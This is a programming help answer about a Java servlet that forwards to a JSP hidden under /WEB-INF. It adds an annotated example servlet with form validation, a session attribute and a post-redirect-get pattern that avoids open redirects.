An alternative is to get rid of the /index.jsp URL altogether and use the /Hai URL all the time. You can achieve this by hiding the JSP away in the /WEB-INF folder (so that the end user can never open it directly and is forced to use the servlet's URL for this) and implementing the doGet() of the servlet as well to display the JSP:
protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    request.getRequestDispatcher("/WEB-INF/index.jsp").forward(request, response);
}
This way, you can just open http://localhost:8080/Project/Hai and see the output of the JSP page and the form will just submit to the very same URL, so the URL in browser address bar will basically not change. I would maybe only change the /Hai to something more sensible, such as /login.
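The forward and redirect behaviour described above, combined into one servlet, as an added example that is not part of the original post. It assumes the javax.servlet API (Servlet 3.0 or later for @WebServlet; the package is jakarta.servlet on Jakarta EE 9+); the class name, the "name" form field and the "error" attribute are hypothetical.

```java
import java.io.IOException;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

// Added example: one servlet owns the /Hai URL. The JSP lives under /WEB-INF,
// so the container refuses direct client requests for it and it can only be
// reached through a server-side forward.
@WebServlet("/Hai")
public class HaiServlet extends HttpServlet {

    private static final String VIEW = "/WEB-INF/index.jsp";

    @Override
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        // Forward: handled inside the same HTTP request, so the browser
        // address bar keeps showing /Hai.
        request.getRequestDispatcher(VIEW).forward(request, response);
    }

    @Override
    protected void doPost(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        String name = request.getParameter("name"); // hypothetical form field

        if (name == null || name.trim().isEmpty()) {
            // Validation failure: forward so the JSP can render the error
            // from a request attribute (hypothetical attribute name).
            request.setAttribute("error", "Name is required");
            request.getRequestDispatcher(VIEW).forward(request, response);
            return; // nothing may be written after a forward
        }

        // The JSP must escape this value on output (for example with JSTL
        // <c:out>), because it is user-controlled.
        request.getSession().setAttribute("name", name.trim());

        // Success: redirect. The client issues a new GET, so a page refresh
        // does not resubmit the form. The target is built from the context
        // path and a constant, never from a request parameter, which would
        // turn this into an open redirect.
        response.sendRedirect(request.getContextPath() + "/Hai");
    }
}
```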